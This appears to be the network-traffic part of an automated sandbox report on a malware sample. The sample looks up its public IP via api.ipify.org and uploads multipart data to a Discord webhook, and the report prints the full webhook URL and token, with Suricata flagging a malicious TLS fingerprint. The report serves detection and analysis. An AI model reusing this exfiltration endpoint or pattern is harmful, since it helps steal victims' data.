Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
discord.com | 162.159.128.233 | |
api.ipify.org | CNAME api4.ipify.org; 104.237.62.212 | |
UDP Requests
Source | Destination |
---|---|
192.168.56.103:50800 | 164.124.101.2:53 |
192.168.56.103:52760 | 164.124.101.2:53 |
192.168.56.103:53673 | 164.124.101.2:53 |
192.168.56.103:64894 | 164.124.101.2:53 |
192.168.56.103:137 | 192.168.56.101:137 |
192.168.56.103:137 | 192.168.56.255:137 |
192.168.56.103:138 | 192.168.56.255:138 |
192.168.56.103:53676 | 239.255.255.250:1900 |
52.231.114.183:123 | 192.168.56.103:123 |
HTTP Requests
GET 200 https://api.ipify.org/
REQUEST
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
RESPONSE
HTTP/1.1 200 OK
Content-Length: 15
Content-Type: text/plain
Date: Wed, 14 Dec 2022 00:38:28 GMT
Vary: Origin
POST 100 https://discord.com/api/webhooks/1052047387167838281/ckxOZHqDK9Fs6wm9uehtyNosd3HZGLhQFPhbdBDnWi6cl945WnENSlc0bCmlN0xY5VHH
REQUEST
POST /api/webhooks/1052047387167838281/ckxOZHqDK9Fs6wm9uehtyNosd3HZGLhQFPhbdBDnWi6cl945WnENSlc0bCmlN0xY5VHH HTTP/1.1
Content-Type: multipart/form-data; boundary=----------3a9f6ffb19e5494e9e58bf8a4c6f254b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: discord.com
Content-Length: 4543
Expect: 100-continue
Connection: Keep-Alive
RESPONSE
HTTP/1.1 100 Continue
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.103:53673 -> 164.124.101.2:53 | 2035465 | ET INFO Observed Discord Domain in DNS Lookup (discord .com) | Misc activity |
TCP 192.168.56.103:49166 -> 162.159.138.232:443 | 2035463 | ET INFO Observed Discord Domain (discord .com in TLS SNI) | Misc activity |
TCP 192.168.56.103:49166 -> 162.159.138.232:443 | 906200022 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49162 -> 104.237.62.212:443 | 906200022 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49166 -> 162.159.138.232:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a3:ea:27:1a:3d:e8:8c:05:5e:1c:c8:1d:59:0e:d2:f2:a1:76:4d:2e |
TLS 1.2 192.168.56.103:49162 -> 104.237.62.212:443 | C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA | CN=*.ipify.org | 19:d7:90:9b:94:40:47:10:c8:4d:0f:e1:85:86:d5:0f:1c:15:9e:f4 |
Snort Alerts
No Snort Alerts